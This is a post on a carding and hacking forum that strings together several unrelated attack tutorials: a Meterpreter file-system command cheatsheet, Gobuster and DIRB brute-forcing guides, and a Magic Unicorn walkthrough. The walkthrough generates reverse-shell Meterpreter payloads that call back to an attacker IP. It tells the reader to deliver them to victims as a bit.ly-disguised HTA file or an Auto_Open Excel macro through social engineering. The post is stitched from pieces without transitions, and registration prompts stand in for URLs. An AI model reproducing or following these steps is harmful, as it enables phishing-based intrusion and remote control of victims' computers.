[Guide] How to Meterpreter File System Commands Cheatsheet

[Guide] How to Meterpreter File System Commands Cheatsheet - Printable Version

+- Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc (https://bhcforums.cc)
+-- Forum: Carding Zone (https://bhcforums.cc/Forum-Carding-Zone)
+--- Forum: Carders Home (https://bhcforums.cc/Forum-Carders-Home)
+--- Thread: [Guide] How to Meterpreter File System Commands Cheatsheet (/Thread-Guide-How-to-Meterpreter-File-System-Commands-Cheatsheet)

[Guide] How to Meterpreter File System Commands Cheatsheet - NINZA - 05-14-2020

Hey Friends!
Did you know that meterpreter is known as Hacker’s Swiss Army Knife!!
Well! Now you do.
Meterpreter, a highly developed payload that can be extended dynamically, is known to be Hacker’s Swiss Army Knife. It uses a reflective DLL injection technique to further compromise the target after the attack. Meterpreter is known to influence the functionality of the Metasploit framework. It can help in doing a lot many things. Some of these include covering tracks after the attack, accessing the operating system, and dumping hashes.
This article discusses meterpreter’s Stdapi File System Commands. There are 21 commands including cat, cd, pwd, and checksum. Figure 1 summarises them:
[Image: 0.png?w=687&ssl=1]

Let’s start discussing them.
cat
It is the very first command in the group of Stdapi File System Commands. It reads the contents of a file to the screen. In other words, cat displays a file’s contents. cat command in meterpreter is same as cat command used in Unix/Linux systems.
The syntax of cat in meterpreter is as follows:
cat filename
1
cat filename
[Image: 1.png?w=687&ssl=1]

cd and pwd
Though cd and pwd commands are two separate commands, they are usually used together. cd stands for change directory and pwd stands for print working directory. You use pwd command to check the directory you are working in. You can change this directory using the cd command. By default, the current working directory is the one where the connection was established.
The syntaxes of pwd and cd commands in meterpreter are as follows:
pwd
1
pwd
cd <path of the folder to change to>
[Image: 2.png?w=687&ssl=1]

checksum
This command retrieves the checksum of a file. The syntax of the checksum command is as follows:
checksum [md5/sha1] file1 file2 file 3...
1
checksum [md5/sha1] file1 file2 file 3...
[Image: 3.png?w=687&ssl=1]

cp
This command copies the content of the old file to the new file. The syntax of the cp command is as follows:
cp <oldfile> < newfile>
1
cp <oldfile> < newfile>
[Image: 4.png?w=687&ssl=1]

dir
This command lists files. It is an alias for the ls command. It provides crucial details related to any file or directories such as File Permissions, Size of File, Last modified date and file Name & Type. The syntax of the dir command is as follows:
dir
1
dir
[Image: 5.png?w=687&ssl=1]

download
This command downloads remote files and directories from a remote location to the local machine. The syntax of download command is as follows:
download [options] src1 src 2 src3... destination
1
download [options] src1 src 2 src3... destination
[Image: 6.png?w=687&ssl=1]

edit
This command edits a file. The syntax of edit command is as follows:
edit <file name>
1
edit <file name>
[Image: 7.png?w=687&ssl=1]

When you press the Enter key, the screen displayed is as shown in the below image:
[Image: 8.png?w=687&ssl=1]

After editing the file, type: x to save the changes and exit, as shown in the below image
[Image: vi.png?w=687&ssl=1]

getlwd
This command prints the working directory on the local machine that is, in our case it is Kali Linux. The syntax of the getlwd command is as follows:
getlwd
1
getlwd
[Image: 10.png?w=687&ssl=1]

getwd
This command prints the working directory. The syntax of the getwd command is as follows:
getwd
1
getwd
[Image: 11.png?w=687&ssl=1]

lcd
This command changes the working directory of the local machine that is, in our case it is Kali Linux. The syntax of lcd is as follows:
lcd
1
lcd
[Image: 12.png?w=687&ssl=1]

You can see that local working directory changes to /root/Desktop
lls
This command lists files on the local machine that is, in our case it is Kali Linux. The syntax of lls command is as follows:
lls
1
lls
[Image: 13.png?w=687&ssl=1]

lpwd
This command prints the working directory on the local machine that is, in our case it is Kali Linux. It is the same as the getlwd command. The syntax of the lpwd command is as follows:
lpwd
1
lpwd
[Image: 14.png?w=687&ssl=1]

ls
This command lists files. The syntax of the ls command is as follows:
ls
1
ls
[Image: 15.png?w=687&ssl=1]

mkdir
This command makes directory. The syntax of the mkdir command is as follows:
mkdir dir1 dir2 dir3...
1
mkdir dir1 dir2 dir3...
[Image: 16.png?w=687&ssl=1]

mv
This command moves a file from source to destination and it can also be used to rename the file as shown. The syntax of the mv command is as follows:
mv oldfile newfile
1
mv oldfile newfile
[Image: 17.png?w=687&ssl=1]

You can see the moved contents using cat command.
pwd
This command prints the working directory. The syntax of the pwd command is as follows:
pwd
1
pwd
[Image: 18.png?w=687&ssl=1]

rm
This command deletes the specified file. The syntax of the rm file is as follows:
rm file1 [file2...]
1
rm file1 [file2...]
[Image: 19.png?w=687&ssl=1]

You can see the list of files before and after using rm command.
rmdir
This command removes the directory. The syntax of the rmdir command is as follows:
rmdir dir1 dir 2 dir 3...
1
rmdir dir1 dir 2 dir 3...
[Image: 20.png?w=687&ssl=1]

search
This command search for files. The syntax of the search command is as follows:
search -f *.doc
1
search -f *.doc
[Image: 21.png?w=687&ssl=1]

show_mount
This command list all mount points/logical drives. The syntax of the show_mount command is as follows:
show_mount
1
show_mount
[Image: 22.png?w=687&ssl=1]

upload
This command uploads a file or directory. The syntax of the upload command is as follows:
upload [options] src1 src2 src3... destination
1
upload [options] src1 src2 src3... destination
[Image: 23.png?w=687&ssl=1]

You can see the uploaded file, as shown in the below image:
[Image: 24.png?w=687&ssl=1]

Hello Friend!! Today we are going demonstrate URLs and DNS brute force attack for extracting Directories and files from inside URLs and sub-domains from DNS by using “Gobuster-tool”.
Table of Content

Introduction & Installation
Using Wordlist for Directory Brute-Force
Obtaining Full Path for a directory or file
Hide Status Code
Verbose Mode
Identify Content-Length
Disable Banner
User-Agent Mode
Obtain Result with Specify Status Code
Timeout
Appending Forward slash
Saving Output Result inside Text File
Enumerating Directory with Specific Extension List
Follow Redirect
HTTP AUTHORIZATION (-u username: password)
DNS Mode
Set Threads Number
Obtain Sub domain IPs
Force Processing Brute Force
Hide Process of Extracting
Extracting CNAME Records

Introduction & Installation
Gobuster is a tool used to brute-force on URLs (directories and files) in websites and DNS subdomains. Gobuster can be downloaded through the apt- repository and thus execute the following command for installing it.
apt-get install gobuster
1
apt-get install gobuster
[Image: 1.png?w=687&ssl=1]

When it will get installed, you can interact with it and can perceive all available option with the help of the following command.
gobuster -h
1
gobuster -h
Common Parameters

-fw – force processing of a domain with wildcard results.
-np – hide the progress output.
-m <mode> – which mode to use, either dir or dns (default: dir).
-q – disables banner/underline output.
-t <threads> – number of threads to run (default: 10).
-u <url/domain> – full URL (including scheme), or base domain name.
-v – verbose output (show all results).
-w <wordlist> – path to the wordlist used for brute forcing (use – for stdin).

Dir mode Parameter

-a <user agent string> – specify a user agent string to send in the request header.
-c – use this to specify any cookies that you might need (simulating auth).
-e – specify the extended mode that renders the full URL.
-f – append / for directory brute forces.
-k – Skip verification of SSL certificates.
-l – show the length of the response.
-n – “no status” mode, disables the output of the result’s status code.
-o <file> – specify a file name to write the output to.
-p <proxy url> – specify a proxy to use for all requests (scheme much match the URL scheme).
-r – follow redirects.
-s <status codes> – comma-separated set of the list of status codes to be deemed a “positive” (default: 200,204,301,302,307).
-x <extensions> – list of extensions to check for, if any.
-P – HTTP Authorization password (Basic Auth only, prompted if missing).
-U – HTTP Authorization username (Basic Auth only).
-to – HTTP timeout. Examples: 10s, 100ms, 1m (default: 10s).

DNS mode Parameters

-cn – show CNAME records (cannot be used with ‘-i’ option).
-i – show all IP addresses for the result.

Using Wordlist for Directory Brute-Force
You can use -w option for using a particular wordlist, for example, common.txt or medium.txt to launch a brute-force attack for extracting web directories or files from inside the target URL.
gobuster -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt
1
gobuster -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt
The above command will dump the all possible files and directories with the help of common.txt wordlist.
[Image: 3.png?w=687&ssl=1]

Obtaining Full Path for a directory or file
Using -e option provides a more significant result, as it Prints complete URL when extracting any file or directories.
gobuster -e -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt
1
gobuster -e -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt
You can compare the following output result from the previous result.
[Image: 4.png?w=687&ssl=1]

Hide Status Code
Using -n Option “no status” mode, it prints the output of the results without displaying the status code.
gobuster -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt -n
1
gobuster -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt -n
The above command will dump all possible files and directory without displaying their status code.
[Image: 5.png?w=687&ssl=1]

Verbose Mode
Using -v option – it enables the verbose parameter and makes brute-force attack vigorously on each file or directory.
gobuster -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt -v
1
gobuster -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt -v
As you can observe from the following option that, this time it has to dump the result including status 404 for missing directories or files.
[Image: 6.png?w=687&ssl=1]

Identify Content-Length
Using -l option enables content-length parameter which displays the size of the response. A Content-Length header is a number denoting and the exact byte length of the HTTP body for extracted file or directory.
gobuster -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt -l
1
gobuster -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt -l
[Image: 7.png?w=687&ssl=1]

Disable Banner
Gobuster always adds the banner to specify the brief introduction of applied options while launching a brute force attack. By using -q option we can disable the banner to hide additional information.
gobuster -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt -q
1
gobuster -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt -q
From the given below image, you can perceive the difference between the last output results and in the current result.
[Image: 8.png?w=687&ssl=1]

User-Agent Mode
Using -an option enables User-Agent mode to specify a user agent string to send in the request header for extracting directories and files from inside the target URL.
gobuster -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt -a Mozilla/5.0 -fw
1
gobuster -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt -a Mozilla/5.0 -fw
[Image: 9.png?w=687&ssl=1]

Obtain Result with Specify Status Code
Using -s Option enables the status code for specific value such as 302, 200, 403, and 404 and so on to obtain certain request pages.
gobuster -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt -s 302
gobuster -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt -s 200
1
2
gobuster -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt -s 302
gobuster -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt -s 200
From the given below image, you can take reference for the output result obtained for the above commands.
[Image: 10.png?w=687&ssl=1]

Timeout
Using -to option enables the timeout parameter for HTTP request and 10 second is the Default time limit for the HTTP request.
gobuster -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt -to 10s
1
gobuster -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt -to 10s
[Image: 11.png?w=687&ssl=1]

Appending Forward slash
Using -f option, appending the forward slash while making brute-force attack on the target URL.
gobuster -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt -f
1
gobuster -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt -f
[Image: 12.png?w=687&ssl=1]

Saving Output Result inside Text File
Using -o option enables saving output result parameter in a text file which can be useful in the future.
gobuster -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt -o result.txt
1
gobuster -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt -o result.txt
We can ensure the result.txt file with the help of cat command
cat result.txt
1
cat result.txt
[Image: 13.png?w=687&ssl=1]

Enumerating Directory with Specific Extension List
There are a lot of situations where we need to extract the directories of a specific extension over the target server, and then we can use the -X parameter of this scan. This parameter accepts the file extension name and then searches the given extension files over the target server or machine.
gobuster -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt -x .php
1
gobuster -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt -x .php
[Image: 14.1.png?w=687&ssl=1]

Follow Redirect
Using -r options enables redirect parameter which redirects HTTP request to another and modifies the Status code for a directory or file.
gobuster -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt -q
gobuster -u

[To see content please register here]

-r -w /usr/share/wordlists/dirb/common.txt -q
1
2
gobuster -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt -q
gobuster -u

[To see content please register here]

-r -w /usr/share/wordlists/dirb/common.txt -q
You can compare the output result of the default scan with redirect output result.
[Image: 14.2.png?w=687&ssl=1]

HTTP AUTHORIZATION (-u username: password)
HTTP Authentication/Authentication mechanisms are all based on the use of 401-status code and WWW-Authenticate response header. The most widely used HTTP authentication mechanisms are Basic. The client sends the user name and password as un-encrypted base64 encoded text.
So, in order to bypass this kind of authentication with the help of Gobuster we have used the command below:
gobuster -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt -U test -P test
1
gobuster -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt -U test -P test
As a result, it is shown Status –code 200 for the test: test and authorized credential on target URL.
[Image: 14.3.png?w=687&ssl=1]

DNS Mode
Using -m option is enabled DNS mode which is effective for public network IP and extracts the sub-domains.
gobuster -m dns -u google.com -w /usr/share/wordlists/dirb/common.txt
1
gobuster -m dns -u google.com -w /usr/share/wordlists/dirb/common.txt
As you can observe the output result from the given below result.
[Image: 14.png?w=687&ssl=1]

Set Threads Number
Using -t option, it enables the number of thread parameter to be applied while brute-forcing sub-domains name or directories.
gobuster -m dns -u google.com -t 100 -w /usr/share/wordlists/dirb/common.txt
1
gobuster -m dns -u google.com -t 100 -w /usr/share/wordlists/dirb/common.txt
[Image: 15.png?w=687&ssl=1]

Obtain sub-domains IPs
Using -i option enables the IP parameter which should be showing IPs of extracted sub-domains.
gobuster -m dns -u google.com -t 100 -w /usr/share/wordlists/dirb/common.txt -i
1
gobuster -m dns -u google.com -t 100 -w /usr/share/wordlists/dirb/common.txt -i
From the given below result, you can observe that it showing IPv4 of Ipv6 for each extracted sub-domains.
[Image: 16.png?w=687&ssl=1]

Force Processing Brute Force
It stops extracting the sub-domains name if meet any Wildcard DNS which is a non-existing domain, therefore uses -fw option to enable force processing parameter to continue the attack even if there is any Wildcard Domain.
gobuster -m dns -u google.com -t 100 -w /usr/share/wordlists/dirb/common.txt -fw
1
gobuster -m dns -u google.com -t 100 -w /usr/share/wordlists/dirb/common.txt -fw
[Image: 17.png?w=687&ssl=1]

Hide Process of Extracting
Using -np option hides the process of extracting sub-domains name while making brute force attack.
gobuster -m dns -u google.com -t 100 -w /usr/share/wordlists/dirb/common.txt -fw -np
1
gobuster -m dns -u google.com -t 100 -w /usr/share/wordlists/dirb/common.txt -fw -np
[Image: 18.png?w=687&ssl=1]

Extracting CNAME Records
Using –cn option enables CNAME Records parameter of the extracted sub-domains and show their CNAME records.
gobuster -m dns -u google.com -t 100 -w /usr/share/wordlists/dirb/common.txt -cn
1
gobuster -m dns -u google.com -t 100 -w /usr/share/wordlists/dirb/common.txt -cn
You can observe the output for above-executed command in the given below result.
[Image: 19.png?w=687&ssl=1]

Proxy URL
Using –p option enables proxy URL to be used for all requests, by default it works on port 1080. As you can observe, on exploring target network IP in the web browser it put up “Access forbidden error” which means this web page is running behind some proxy.
[Image: 50.png?w=687&ssl=1]

To ensure this prediction, we run the gobuster command twice, firstly on port 80 which is by default and further on port 3129 along with –p option which enables proxy parameter.
gobuster -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt
gobuster -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt –p 192.168.1.108:3129
1
2
gobuster -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt
gobuster -u

[To see content please register here]

-w /usr/share/wordlists/dirb/common.txt –p 192.168.1.108:3129
From the given below image, you can take reference for the output result obtained for above commands, here we haven’t obtained any directory or file on executing the first command where else in the second command executed successfully.
[Image: 52.png?w=687&ssl=1]

Magic Unicorn is a simple tool for using a PowerShell downgrade attack that injects shellcode straight into memory. It is based on Matthew Graeber’s PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
Table of Contents

Powershell Attack Instruction
HTA Attack Instruction
Macro Attack Instruction

Download the unicorn tool from the git repository:
git clone

[To see content please register here]

1
git clone

[To see content please register here]

Once downloaded, go in the directory and run unicorn with the following command to see all the possible methods.
./unicorn.py
1
./unicorn.py
[Image: 2.png?w=687&ssl=1]

Powershell Attack Instructions
First, we will try the reverse_tcp payload. As we can see in the main menu all the commands are already written. We just need to replace the IP with our IP.
python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.109 4444
1
python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.109 4444
[Image: 3.png?w=687&ssl=1]

Now this will give us two files. One is a text file named “powershell_attack.txt” which has the PowerShell code that will be run in the victim’s machine using social engineering and the other is “unicorn.rc” which is a custom Metasploit file that will automatically set all the parameters and start a listener.
[Image: 4.png?w=687&ssl=1]

These files will be saved in the directory where unicorn was cloned. Powershell_attack.txt holds the malicious code and when the victim will execute that code in his command prompt, the attacker will get a reverse connection of his machine.
[Image: 5.png?w=687&ssl=1]

Now let’s set up a listener first. We need to run the Metasploit “unicorn.rc” file using the following command:
msfconsole -r unicorn.rc
1
msfconsole -r unicorn.rc
[Image: 6.png?w=687&ssl=1]

We see a session was obtained in the meterpreter. It was because the PowerShell code was executed in the victim’s command shell. It would have looked something like this:
[Image: 7.png?w=687&ssl=1]

HTA Attack Instructions
For our next attack, we will be using an HTA payload.
python unicorn.py windows/meterpreter/reverse_https 192.168.1.109 4455 hta
1
python unicorn.py windows/meterpreter/reverse_https 192.168.1.109 4455 hta
[Image: 8.png?w=687&ssl=1]

Now convert your IP in bit.ly URL form and send to the victim and then wait for the user to click on the “launcher.hta” file which could be done using social engineering easily.
[Image: 9.png?w=687&ssl=1]

So, we set up a Metasploit listener next using the RC file and wait for the user to click on the hta payload.
msfconsole -r unicorn.rc
1
msfconsole -r unicorn.rc
[Image: 10.png?w=687&ssl=1]

As soon as he ran the file, we received a meterpreter session. We checked the system info using the sysinfo command.
[Image: 11.png?w=687&ssl=1]

Macro Attack Instructions
Now for the third and final payload for this tutorial, we set hands on our beloved macros.
python unicorn.py windows/meterpreter/reverse_https 192.168.1.109 443 macro
1
python unicorn.py windows/meterpreter/reverse_https 192.168.1.109 443 macro
[Image: 12.png?w=687&ssl=1]

This again creates a text file and a “.rc” file with the same name and on the same destination.
[Image: 13.png?w=687&ssl=1]

To enable developer mode there are various methods depending upon your version of MS office.
As for a generic approach, let’s say you enabled it like:
File->properties->ribbons->developer mode
[Image: 15.png?w=687&ssl=1]

You will see an extra tab labeled developer once it gets enabled.
As for the attack, go to developer->macros and create a new macro named “Auto_Open”
[Image: 16.png?w=687&ssl=1]

Simply paste the contents from “powershell_attack.txt” to this xlsx module and save it.
[Image: 17.png?w=687&ssl=1]

As soon as you click run (little green icon on the top), it will give you an error! Don’t worry! You want that error. It is supposed to happen.
[Image: 18.png?w=687&ssl=1]

Soon after the error on the user screen, we would have obtained a session successfully in meterpreter!
Use sysinfo double check our successful exploitation using unicorn!
[Image: 19.png?w=687&ssl=1]

In this article, we are focusing on the transient directory using Kali Linux tool DIRB and trying to find hidden files and directories within a web server.
A path traversal attack is also known as “directory traversal” aims to access files and directories that are stored outside the web root folder. By manipulating variables with reference files with “dot-dot-slash (…/)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code, configuration, and critical system files.
Source:

[To see content please register here]

Requirements
Target- BWAPP Labs, DVWA Labs,
Attacker – Kali Linux
Table of Content

Introduction to DIRB
Utilizing Multiple Wordlist for Directory Traversing
Default working of Dirb
Enumerating Directory with Specific Extension List
Save Output to Disk
Ignore Unnecessary Status-Code
Default Working Vs Not stop on WARNING messages Working
Speed delay
Not recursively (-r)
Show NOT Existence Pages
Extension List (-X parameter) Vs Extension Header (-H parameter)
Not forcing an ending ‘/’ on URLs (-t)
HTTP Authentication (-u username: password)

What is DIRB?
DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary-based attack against a web server and analyzing the response.
It comes with a set of preconfigured attack wordlists for easy usage but you can use your custom wordlists. Also, DIRB sometimes can be used as a classic CGI scanner, but remember is a content scanner, not a vulnerability scanner.
The main purpose is to help in professional web application auditing. Especially in security-related testing. It covers some holes not covered by classic web vulnerability scanners. DIRB looks for specific web objects that other generic CGI scanners can’t look for. It doesn’t search vulnerabilities nor does it look for web contents that can be vulnerable.
Source:

[To see content please register here]

Tool DIRB is built-in Kali Linux. Open the terminal and type the following command to get an overview of the tools included in the package:
dirb
-a <agent_string> : Specify your custom USER_AGENT.
-c <cookie_string> : Set a cookie for the HTTP request.
-f : Fine tunning of NOT_FOUND (404) detection.
-H <header_string> : Add a custom header to the HTTP request.
-i : Use case-insensitive search.
-l : Print “Location” header when found.
-N <nf_code>: Ignore responses with this HTTP code.
-o <output_file> : Save output to disk.
-p <proxy[:port]> : Use this proxy. (Default port is 1080)
-P <proxy_username:proxy_password> : Proxy Authentication.
-r : Don’t search recursively.
-R : Interactive recursion. (Asks for each directory)
-S : Silent Mode. Don’t show tested words. (For dumb terminals)
-t : Don’t force an ending ‘/’ on URLs.
-u <username:password> : HTTP Authentication.
-v : Show also NOT_FOUND pages.
-w : Don’t stop on WARNING messages.
-X <extensions> / -x <exts_file> : Append each word with this extensions.
-z : Add a milliseconds delay to not cause excessive Flood.
[Image: 1.png?w=687&ssl=1]

Utilizing Multiple Wordlist for Directory Traversing
The above attack works by using the default wordlist_files common.txt, but we can change this word list and could select another wordlist for directory traversal. You must follow the following path to view all available wordlists.
cd /usr/share/wordlists/dirb
ls –la
cd /usr/share/wordlists/vulns
ls -la
1
2
3
4
cd /usr/share/wordlists/dirb
ls –la
cd /usr/share/wordlists/vulns
ls -la
You can see from the image below that there are so many text files as wordlist; we can use them as required.
[Image: 2.png?w=687&ssl=1]

Default working of Dirb
In this attack the common.txt is set as a default word list for directory traversal, the protester can use the following command. Open the terminal and type the following command to start the Brussels Directory attack.
dirb

[To see content please register here]

1
dirb

[To see content please register here]

Using the common.txt file, the DIRB returns the enumerated directories found within the target URL as shown in the below image.
[Image: 3.png?w=687&ssl=1]

Enumerating Directory with Specific Extension List
There are a lot of situations where we need to extract the directories of a specific extension over the target server, and then we can use the -X parameter of the dirb scan. This parameter accepts the file extension name and then searches the given extension files over the target server or machine.
dirb

[To see content please register here]

-X .php
1
dirb

[To see content please register here]

-X .php
The above command will extract all directory path related to php extension as shown the following image.
[Image: 4.png?w=687&ssl=1]

Save Output to Disk
For the purpose of the record maintenance, better readability, and future references, we save the output of the dirb scan onto a file. To this, we will use the parameter -o of the dirb scan we can save the output of the dirb scan in a text file.
dirb

[To see content please register here]

-o output.txt
1
dirb

[To see content please register here]

-o output.txt
The above command will generate an output.txt file at the desktop of the enumerated directories.
[Image: 5.png?w=687&ssl=1]

Now that we have successfully executed the command, now let’s traverse to the location to ensure whether the output has been saved on the file on not. In this case, our location for output is /root/output.txt.
[Image: 6.png?w=687&ssl=1]

Ignore Unnecessary Status-Code
The Status-Code element is a 3-digit integer where the first digit of the Status-Code defines the class of response and the last two digits do not have any categorization role. In this attack, we are using –N parameter on code 302 as shown below.
dirb

[To see content please register here]

-N 302
1
dirb

[To see content please register here]

-N 302
As you can grasp from the given screenshot that the dirb scan is ignoring the NOT FOUND code that is., 302.
[Image: 7.png?w=687&ssl=1]

Default Working Vs Nonstop on WARNING messages Working
During the normal dirb scan as shown below, some of the pages generate warnings; the dirb scan skips those directories where it encounters any warnings.
dirb

[To see content please register here]

1
dirb

[To see content please register here]

While doing a scan that is to be done very deeply and verbosely, we want that the dirb scan to not avoid these warnings and do an in-depth scan, hence we use the -w parameter of the dirb scan.
dirb

[To see content please register here]

-w
1
dirb

[To see content please register here]

-w
As you can observe the highlighted directory /dev/shell is enumerated even after warning message which is missing in the default scan.
[Image: 9.png?w=687&ssl=1]

Speed delay
While working in different scenarios, there is some environment we come across that cannot handle the flood created by the dirb scan, so in those environments, it is important that we delay the scan for some time. This can be done easily with the -z parameter of the dirb scan. In this parameter, the time is provided on the scale of milliseconds. Like as shown in our given example, we have given 100 seconds delay to dirb.
dirb

[To see content please register here]

-z 100
1
dirb

[To see content please register here]

-z 100

Not recursively (-r)
The dirb scan, by default, scans the directories recursively. It means it scans a directory and then traverses inside that directory to scan for more subdirectories. But in some scenarios, where time is insufficient, we set the dirb to not scan recursively. This can be achieved using the -r parameter.
dirb

[To see content please register here]

-r
1
dirb

[To see content please register here]

-r

Show NOT Existence Pages
A 404 error is an HTTP status code that means that the page you were trying to reach on a website couldn’t be found on their server. 404 Not Found error messages are frequently customized by individual websites. In some scenarios we need to find the 404 pages too, which dirb skips by default. To find those pages we will use -v parameter.
dirb

[To see content please register here]

-v
1
dirb

[To see content please register here]

-v
From given below the image you can observe it has also extracted all those directories are relevant to 404 errors.
[Image: 12.png?w=687&ssl=1]

Extension List (-X parameter) Vs Extension Header (-H parameter)
By using the –X parameter along with target URL with a specific extension, for example, .php, it enumerates all file or directory with .php extension, but by using –H parameter with specific extension, for example .php along with target URL it will enumerate all files or directories named with php as shown in the given below image.
dirb

[To see content please register here]

-H .php
1
dirb

[To see content please register here]

-H .php

Not forcing an ending ‘/’ on URLs (-t)
From the attacks used in the previous situations, in order to run the dirb tool, we will have to add a forward slash (/) at the end of the URL to be accepted in dirb. In order to check that we need to try one attack on URL ending without any forward slash.
dirb

[To see content please register here]

1
dirb

[To see content please register here]

You will observe that the scan doesn’t get executed successfully because of the lack of the forward slash, the importance of which we discussed earlier in this article.
Try this attack once again with the same command with some changes so in order to run that command we have to add –t in the previous command.
dirb

[To see content please register here]

-t
1
dirb

[To see content please register here]

-t
As now we can observe that the even in the absence of the forward slash, we still have successfully executed the dirb scan.
[Image: 14.png?w=687&ssl=1]

HTTP AUTHORIZATION (-u username: password)
HTTP Authentication/Authentication mechanisms are all based on the use of 401-status code and WWW-Authenticate response header. The most widely used HTTP authentication mechanisms are Basic. The client sends the user name and password as unencrypted base64 encoded text.
So, in order to bypass this kind of authentication with the help of dirb we have used the command below:
dirb

[To see content please register here]

-u test:test
1
dirb

[To see content please register here]

-u test:test
As a result, it is shown Status –code 200 for the test: test and authorized credential on target URL.
[Image: 15.png?w=687&ssl=1]

To ensure this prediction, we run the dirb command twice, firstly on port 80 which is by default and further on port 3129 along with –p option which enables proxy parameter.
dirb

[To see content please register here]

dirb

[To see content please register here]

–p 192.168.1.108:3129
1
2
dirb

[To see content please register here]

dirb

[To see content please register here]

–p 192.168.1.108:3129
From the given below image, you can take reference for the output result obtained for above commands, here we haven’t obtained any directory or file on executing the first command where else in the second command executed successfully.
[Image: 51.png?w=687&ssl=1]